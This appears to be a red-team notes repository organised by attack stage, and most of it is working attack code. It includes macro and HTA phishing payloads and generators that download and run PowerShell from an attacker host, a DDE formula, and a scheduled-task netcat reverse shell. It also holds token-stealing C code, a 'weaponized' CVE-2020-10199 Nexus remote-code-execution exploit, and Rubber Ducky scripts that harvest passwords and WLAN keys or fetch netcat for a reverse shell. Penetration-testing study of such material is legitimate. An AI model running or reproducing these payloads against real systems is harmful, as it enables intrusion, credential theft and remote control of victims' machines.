├── 1.-Initial Access ├── Exploit Public Applications │ ├── README.txt │ └── Rejetto.txt ├── External Remote Services │ ├── External Remote Services.txt │ └── README.txt └── Phishing │ ├── Attachments │ ├── HTA.txt │ ├── Macros.txt │ └── README.txt │ ├── Generators │ ├── HTA-Generator.py │ └── Macro-Generator.py │ ├── Links │ └── Frameworks.txt │ └── README.txt ├── 2.-Execution ├── Command and Scripting Interpreter.txt ├── Component Object Model (COM).txt ├── Dynamic Data Exchange (DDE).txt ├── Office Applications.txt ├── README.txt ├── Scheduled Tasks.txt └── User Execution.txt ├── 3.-Persistence ├── README.txt └── Tools.txt ├── 4.-Privilege Escalation ├── Create Process Token.txt ├── DLLSideloader.zip ├── PPID-Spoof.zip ├── PrintSpoofer.zip ├── README.txt ├── SharpUp.zip └── UACME.zip ├── CVEs ├── CVE-2020-0688 │ ├── Exploit.md │ └── cve-2020-0688.zip ├── CVE-2020-0796 │ ├── README.md │ └── cve-2020-0796-local.zip ├── CVE-2020-10199 │ ├── 1.png │ ├── CVE-2020-10199.py │ └── readme.md └── README.md ├── Misc └── Rubber Ducky │ ├── Credential Grabber.txt │ ├── Get WLAN Keys.txt │ ├── Netcat Reverse Payload.txt │ ├── README.md │ └── Rubber-Ducky-README.md ├── Payloads └── Generators │ ├── BAT-Generator.py │ ├── HTA-Generator.py │ ├── MSBuildXMLPayload.py │ ├── Macro-Generator.py │ ├── Padding.py │ └── README.md ├── README.md └── Tool Installer └── Tools-Kali-Installation.py /1.-Initial Access/Exploit Public Applications/README.txt: -------------------------------------------------------------------------------- 1 | An example on how public aaplications can be exploited and APT can gain Execution -------------------------------------------------------------------------------- /1.-Initial Access/Exploit Public Applications/Rejetto.txt: -------------------------------------------------------------------------------- 1 | Link: 2 | 3 | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/initial-access/t1190-exploit-public-facing-applications/rejetto-http-file-server-hfs-2.3 -------------------------------------------------------------------------------- /1.-Initial Access/External Remote Services/External Remote Services.txt: -------------------------------------------------------------------------------- 1 | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/initial-access/untitled -------------------------------------------------------------------------------- /1.-Initial Access/External Remote Services/README.txt: -------------------------------------------------------------------------------- 1 | An example on how Remote Services can be exploited and can help with gaining Initial Access to the Network -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Attachments/HTA.txt: -------------------------------------------------------------------------------- 1 | This file needs to be saved as an HTA file (.hta) 2 | This can be attached or sent as a link as well it will execute once the user allows it and will call a powershell code 3 | Copy and Paste the following code and save it. 4 | 5 | ############################################################################### 6 | 7 | 8 | 9 | 10 | 11 | Payload 12 | 17 | 22 | 23 | 24 |
25 | 26 |
27 | 28 | 29 | 30 | 31 | ############################################################################# -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Attachments/Macros.txt: -------------------------------------------------------------------------------- 1 | Office: 2 | 3 | Enable Developor Ribbon 4 | 5 | Then copy paste the following code onto a Word Doc and save it as a Macro-Enabled Document (.docm) 6 | When the file is opened the PowerShell Code will be executed 7 | 8 | ######################################################## 9 | 10 | Sub Auto_Open() 11 | Dim exec As String 12 | Dim payload As String 13 | exec = "powershell.exe -WindowStyle hidden -nologo -noprofile -c ""IEX ((New-Object Net.WebClient).DownloadString('http://10.0.2.20:8000/payload.ps1'))""" 14 | Shell (exec) 15 | End Sub 16 | Sub AutoOpen() 17 | Auto_Open 18 | End Sub 19 | Sub Workbook_Open() 20 | Auto_Open 21 | End Sub 22 | 23 | ######################################################## -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Attachments/README.txt: -------------------------------------------------------------------------------- 1 | Some samples of malware that can be attached to the Email sent to the Target -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Generators/HTA-Generator.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/python3 env 2 | # A simple HTA Generator 3 | # This can be used to later Obfuscate 4 | # Simple POC does not BYpass AV 5 | print(""" 6 | _ _ _______ _____ _ 7 | | | | |__ __|/\ / ____| | | 8 | | |__| | | | / \ | | __ ___ _ __ ___ _ __ __ _| |_ ___ _ __ 9 | | __ | | | / /\ \ | | |_ |/ _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__| 10 | | | | | | |/ ____ \ | |__| | __/ | | | __/ | | (_| | || (_) | | 11 | |_| |_| |_/_/ \_\ \_____|\___|_| |_|\___|_| \__,_|\__\___/|_| 12 | 13 | """) 14 | html_title = input ("Choose an HTML Title >>") 15 | app_name = input ("Choose App Name >>") 16 | payload_n = input ("Payload Name >>") 17 | print ("Example: http://example:80/Payload.ps1") 18 | URL = input("Enter Full URL with PS1 payload name >>") 19 | 20 | hta_payload = payload_n + ".hta" 21 | 22 | hta = "\n" 23 | hta += "\n" 24 | hta += "\n" 25 | hta += "\n" 26 | hta += "" + html_title + "\n" 27 | hta += "\n" 36 | hta += "\n" 45 | hta += "\n" 46 | hta += "\n" 47 | hta += "\n" 48 | hta += "\n" 49 | 50 | hf = open(hta_payload, 'w') 51 | hf.write(hta) 52 | hf.close() 53 | 54 | print ("File saved as: " + hta_payload) -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Generators/Macro-Generator.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/python3 env 2 | # A simpe Macro Generator 3 | # Simple POC, this can be used with other tools to obfuscate 4 | # Will Bypass nothing 5 | 6 | print (""" 7 | __ __ _____ _ 8 | | \/ | / ____| | | 9 | | \ / | __ _ ___ _ __ ___ ______| | __ ___ _ __ ___ _ __ __ _| |_ ___ _ __ 10 | | |\/| |/ _` |/ __| '__/ _ \______| | |_ |/ _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__| 11 | | | | | (_| | (__| | | (_) | | |__| | __/ | | | __/ | | (_| | || (_) | | 12 | |_| |_|\__,_|\___|_| \___/ \_____|\___|_| |_|\___|_| \__,_|\__\___/|_| 13 | 14 | 15 | """) 16 | 17 | macro_name = input ("Choose File name >>") 18 | print ("Example: http://example:80/Payload.ps1") 19 | url = input ("Enter Full URL payload with PS Filename included >>") 20 | 21 | macro_payload = macro_name + '.vbs' 22 | macro = "Sub Auto_Open()\n" 23 | macro += " Dim exec As String\n" 24 | macro += " Dim payload As String\n" 25 | macro += """ exec = "powershell.exe -WindowStyle hidden -nologo -noprofile -c ""IEX ((New-Object Net.WebClient).DownloadString""" 26 | macro += "('" 27 | macro += str(url) 28 | macro += "'))\"\"\"\n" 29 | macro += " Shell (exec)\n" 30 | macro += "End Sub\n" 31 | macro += "Sub AutoOpen()\n" 32 | macro += " Auto_Open\n" 33 | macro += "End Sub\n" 34 | macro += "Sub Workbook_Open()\n" 35 | macro += " Auto_Open\n" 36 | macro += "End Sub\n" 37 | 38 | macrof = open(macro_payload, 'w') 39 | macrof.write(macro) 40 | macrof.close() 41 | 42 | print ("File saved as: " + macro_name) 43 | -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Links/Frameworks.txt: -------------------------------------------------------------------------------- 1 | This just requires you to install Setoolkit or Gophish 2 | 3 | Their proper githus are listed below: 4 | 5 | Setoolkit: 6 | 7 | https://github.com/trustedsec/social-engineer-toolkit 8 | 9 | GoPhish: 10 | 11 | https://github.com/gophish/gophish 12 | -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/README.txt: -------------------------------------------------------------------------------- 1 | Generator Tools has been aded to this folder to create the various payloads for Intial Access. 2 | 3 | FYI: These are very simple and known payloads (Will get caught) -------------------------------------------------------------------------------- /2.-Execution/Command and Scripting Interpreter.txt: -------------------------------------------------------------------------------- 1 | Please refer to the URL to view the various available 2 | 3 | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/execution/t1059-command-and-scripting-interpreter -------------------------------------------------------------------------------- /2.-Execution/Component Object Model (COM).txt: -------------------------------------------------------------------------------- 1 | The blogs and code will be added here so you can check them out 2 | 3 | Blogs: 4 | 5 | https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ 6 | https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html 7 | 8 | Code: 9 | 10 | Get-CimInstance -ClassName Win32_COMApplication 11 | Get-CimInstance -ClassName Win32_COMApplication -Property * |Select-String Shell Windows 12 | $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-A442-00A0C90A8F39') 13 | $obj = [System.Activator]::CreateInstance($com) 14 | $obj 15 | 16 | $item.Document.Application.ShellExecute('calc.exe') -------------------------------------------------------------------------------- /2.-Execution/Dynamic Data Exchange (DDE).txt: -------------------------------------------------------------------------------- 1 | The Command utilized on the Excel Example to execute our payload: 2 | 3 | =cmd|'/c powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString(\"http://10.0.2.8:8080/Invoke-PowerShellTcp.ps1\");'!_xlbgnm.A1 4 | 5 | #### 6 | Note 7 | #### 8 | 9 | The last two chracters point to the cell of the spreadsheet make sure these match when adding the command -------------------------------------------------------------------------------- /2.-Execution/Office Applications.txt: -------------------------------------------------------------------------------- 1 | I used the same as using a Macro it is intended for another user that probably needs it in another workstation and this code can get executed 2 | 3 | Link: 4 | 5 | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/execution/t1203-exploitation-for-client-execution/office-applications -------------------------------------------------------------------------------- /2.-Execution/README.txt: -------------------------------------------------------------------------------- 1 | This folder mostly contains command lines that are used for acheving execution on the Target Machine -------------------------------------------------------------------------------- /2.-Execution/Scheduled Tasks.txt: -------------------------------------------------------------------------------- 1 | Command: 2 | 3 | schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 192.168.56.103 1337 -e cmd.exe' -------------------------------------------------------------------------------- /2.-Execution/User Execution.txt: -------------------------------------------------------------------------------- 1 | There are 2 methods: 2 | 3 | Files and Links. We are fmailiar with these already but there is a repo that I used for reference incase I need to create payloads 4 | that will help me eecute code through malicious files, these files are not "Malicious" as all they do is Pop Calc 5 | 6 | Link: 7 | 8 | https://github.com/arntsonl/calc_security_poc -------------------------------------------------------------------------------- /3.-Persistence/README.txt: -------------------------------------------------------------------------------- 1 | This folder mostly contains references for Persistence Methods, I added a few tools that can help, 2 | for finding and exploiting a few of the weaknesses for this category. 3 | 4 | Most of this category just contains methods on how to achieve Persistence there is no special tool to achive this 5 | just various enumeration one's or helpers to build the proper binary but nothing extraordinary 6 | 7 | Link: 8 | 9 | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/persistence -------------------------------------------------------------------------------- /3.-Persistence/Tools.txt: -------------------------------------------------------------------------------- 1 | SharpUp.exe: 2 | 3 | https://github.com/GhostPack/SharpUp 4 | 5 | DLLSideLoader: 6 | 7 | https://github.com/Flangvik/DLLSideloader 8 | 9 | DLLSpy: 10 | 11 | https://github.com/cyberark/DLLSpy -------------------------------------------------------------------------------- /4.-Privilege Escalation/Create Process Token.txt: -------------------------------------------------------------------------------- 1 | Code utilized to grab, duplicate and open cmd with an Administrator notepad process 2 | 3 | ###################################################################################### 4 | 5 | #include "stdafx.h" 6 | #include 7 | #include 8 | 9 | int main(int argc, char * argv[]) { 10 | char a; 11 | HANDLE processHandle; 12 | HANDLE tokenHandle = NULL; 13 | HANDLE duplicateTokenHandle = NULL; 14 | STARTUPINFO startupInfo; 15 | PROCESS_INFORMATION processInformation; 16 | DWORD PID_TO_IMPERSONATE = 3060; 17 | wchar_t cmdline[] = L"C:\\shell.cmd"; 18 | ZeroMemory(&startupInfo, sizeof(STARTUPINFO)); 19 | ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION)); 20 | startupInfo.cb = sizeof(STARTUPINFO); 21 | 22 | processHandle = OpenProcess(PROCESS_ALL_ACCESS, true, PID_TO_IMPERSONATE); 23 | OpenProcessToken(processHandle, TOKEN_ALL_ACCESS, &tokenHandle); 24 | DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle); 25 | CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, NULL, cmdline, 0, NULL, NULL, &startupInfo, &processInformation); 26 | 27 | std::cin >> a; 28 | return 0; 29 | } 30 | 31 | ###################################################################################### -------------------------------------------------------------------------------- /4.-Privilege Escalation/DLLSideloader.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/DLLSideloader.zip -------------------------------------------------------------------------------- /4.-Privilege Escalation/PPID-Spoof.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/PPID-Spoof.zip -------------------------------------------------------------------------------- /4.-Privilege Escalation/PrintSpoofer.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/PrintSpoofer.zip -------------------------------------------------------------------------------- /4.-Privilege Escalation/README.txt: -------------------------------------------------------------------------------- 1 | This category contains a few tools that can help achieve Privilege Escalation, enumerate this category or achive this with certain tools 2 | there is nothing specific to this as their many methods to reach this goal. 3 | -------------------------------------------------------------------------------- /4.-Privilege Escalation/SharpUp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/SharpUp.zip -------------------------------------------------------------------------------- /4.-Privilege Escalation/UACME.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/UACME.zip -------------------------------------------------------------------------------- /CVEs/CVE-2020-0688/Exploit.md: -------------------------------------------------------------------------------- 1 | Microsoft Exchange Remote Code Execution. 2 | -------------------------------------------------------------------------------- /CVEs/CVE-2020-0688/cve-2020-0688.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/CVEs/CVE-2020-0688/cve-2020-0688.zip -------------------------------------------------------------------------------- /CVEs/CVE-2020-0796/README.md: -------------------------------------------------------------------------------- 1 | A local privilege Escalation 2 | -------------------------------------------------------------------------------- /CVEs/CVE-2020-0796/cve-2020-0796-local.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/CVEs/CVE-2020-0796/cve-2020-0796-local.zip -------------------------------------------------------------------------------- /CVEs/CVE-2020-10199/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/CVEs/CVE-2020-10199/1.png -------------------------------------------------------------------------------- /CVEs/CVE-2020-10199/CVE-2020-10199.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import sys 4 | from cmd import Cmd 5 | import os 6 | import base64 7 | 8 | headers ={ 9 | 'X-Requested-With': 'XMLHttpRequest' 10 | } 11 | 12 | class Prompt(Cmd): 13 | prompt = 'Shell>' 14 | intro = 'Usage: cmd \n' 15 | def __init(self): 16 | Cmd.__init__(self) 17 | def help_cmd(self): 18 | print("Execute a command on the server.\nUsage: cmd \n") 19 | def help_exit(self): 20 | print("Exits") 21 | def do_exit(self,arg): 22 | print("Exits") 23 | return True 24 | def do_cmd(self,command): 25 | if(command != ""): 26 | ExecuteCommand(command) 27 | else: 28 | print("Specify a command") 29 | 30 | def ExecuteCommand(command): 31 | url = sys.argv[1] 32 | username = base64.b64encode(sys.argv[2]) 33 | password = base64.b64encode(sys.argv[3]) 34 | req = requests.session() 35 | data = {'username':username,'password':password} 36 | log_req = req.post(url+"/service/rapture/session",data=data,headers=headers) 37 | data2 = '''{ 38 | "name": "internal", 39 | "online": "true", 40 | "storage": { 41 | "blobStoreName": "default", 42 | "strictContentTypeValidation": "true" 43 | }, 44 | "group": { 45 | "memberNames": ["${' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}"] 46 | } 47 | }''' 48 | proxies = {'http': 'http://127.0.0.1:8080'} 49 | 50 | log_req2 = req.post(url+"/service/rest/beta/repositories/go/group",data=data2,headers={'404':command,'Content-Type': 'application/json'},proxies=proxies) 51 | print log_req2.text 52 | 53 | 54 | 55 | if __name__ == '__main__': 56 | if len(sys.argv)!=4: 57 | print len(sys.argv) 58 | sys.exit("\n [+] Usage: python %s http://127.0.0.1:8080 username password" % sys.argv[0]) 59 | os.system('cls') 60 | Prompt = Prompt() 61 | Prompt.cmdloop() 62 | 63 | -------------------------------------------------------------------------------- /CVEs/CVE-2020-10199/readme.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-10199 2 | 3 | 回显版本 随手写的未测试bug 4 | 5 | ``` 6 | Usage: python http://127.0.0.1:8080 username password 7 | 8 | ``` 9 | 10 | ![](./1.png) 11 | 12 | 参考:https://www.cnblogs.com/magic-zero/p/12641068.html -------------------------------------------------------------------------------- /CVEs/README.md: -------------------------------------------------------------------------------- 1 | A compilation of CVE exploits, I will try and do as best as possible to compile them and have them already weaponized 2 | so they should be able to just be executed on the go. Will try to keep this as updated as possible. As not all CVE have a 3 | public PoC Code. 4 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/Credential Grabber.txt: -------------------------------------------------------------------------------- 1 | REM Title: Credential Grabber 2 | REM Author: David Garcia [dmcxblue] 3 | REM Version: 1.0 4 | REM Description: 5 | DELAY 200 6 | REM --> Minimize all windows 7 | GUI d 8 | DELAY 500 9 | REM --> Run powershell 10 | GUI r 11 | STRING powershell 12 | ENTER 13 | DELAY 1000 14 | ALT y 15 | DELAY 500 16 | REM --> Open powershell and create a folder called ducky to save all the loot 17 | STRING mkdir C:\Users\[user]\AppData\Local\Temp\ducky 18 | ENTER 19 | DELAY 150 20 | REM --> Move into the new directory 21 | STRING cd C:\Users\[user]\AppData\Local\Temp\ducky 22 | rem --> Start looting 23 | STRING systeminfo.exe > systeminfo.txt 24 | ENTER 25 | DELAY 200 26 | REM --> This will find any missing patches that will help on Local Priviledge or Remote Exploits 27 | STRING wmic qfe get Caption,Description,HotFixID,InstalledOn > patches.txt 28 | REM --> Passwords 29 | ENTER 30 | DELAY 250 31 | REM --> Will look for passwords in TXT files 32 | STRING findstr /si password *.txt > passwords.txt 33 | ENTER 34 | DELAY 100 35 | REM --> Will look for passwords in XML files 36 | STRING findstr /si password *.xml > passwords-xml.txt 37 | ENTER 38 | DELAY 100 39 | REM --> Will look for passwords in INI files 40 | STRING findstr /si password *.ini > passwords-ini.txt 41 | ENTER 42 | DELAY 250 43 | REM --> Looks for all passwords in all files 44 | STRING findstr /spin "password" *.* > passwords-all.txt 45 | ENTER 46 | DELAY 100 47 | REM --> Now to look for passwords in registry 48 | ENTER 49 | DELAY 100 50 | STRING reg query HKLM /f password /t REG_SZ /s > HKLM_passqords.txt 51 | ENTER 52 | DELAY 250 53 | STRING reg query HKCU /f password /t REG_SZ /s > HKCU_passwords.txt 54 | ENTER 55 | DELAY 500 56 | REM --> Open Folder to grab loot!! 57 | ENTER 58 | STRING Invoke-Item [PATH to ducky folder in TEMP] 59 | ENTER 60 | DELAY 1000 61 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/Get WLAN Keys.txt: -------------------------------------------------------------------------------- 1 | REM Title: WLAN Keys 2 | REM Author: David Garcia [dmcxblue] 3 | REM Version: 1 4 | REM Description: A simple script that runs cmd and uses netsh to grab clear text WLAN Keys 5 | DELAY 200 6 | REM --> Starts cmd 7 | WINDOWS d 8 | DELAY 500 9 | STRING cmd 10 | ENTER 11 | DELAY 1000 12 | STRING netsh wlan show profiles 13 | ENTER 14 | DELAY 500 15 | REM --> This will show the profiles of all WiFi connected previously and Currently 16 | REM --> Edit to Wifi Name you need the key from without '[]' 17 | ENTER 18 | DELAY 500 19 | STRING netsh wlan show profile [WIFI-NAME] key=clear 20 | ENTER 21 | DELAY 500 22 | REM --> Uncomment [REM] and this will save to the TEMP Folder 23 | REM --> If WiFi has spaces on it's name use double-quotes "[Wifi]" 24 | REM STRING netsh wlan show profile "[WIFI-NAME]" key=clear > %TEMP%\keys.txt 25 | REM DELAY 100 26 | REM ENTER 27 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/Netcat Reverse Payload.txt: -------------------------------------------------------------------------------- 1 | REM Title: Netcat Reverse Shell 2 | REM Author: David Garcia [dmcxblue] 3 | REM Version: 1.1 4 | REM Description: 5 | DELAY 200 6 | REM --> Minimize all windows 7 | WINDOWS d 8 | DELAY 500 9 | REM --> Start powershell here 10 | GUI r 11 | DELAY 600 12 | STRING powershell Start-Process powershell -Verb RunAs 13 | ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 500 17 | REM --> Downloads NetCat and Enables TLS just in case of TLS errors 18 | DELAY 500 19 | STRING [Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls" 20 | ENTER 21 | DELAY 500 22 | STRING Invoke-WebRequest "https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe" -OutFile "%TEMP%\nc.exe" 23 | ENTER 24 | DELAY 500 25 | REM --> Save's to the TEMP folder 26 | STRING cd %TEMP% 27 | STRING .\nc.exe 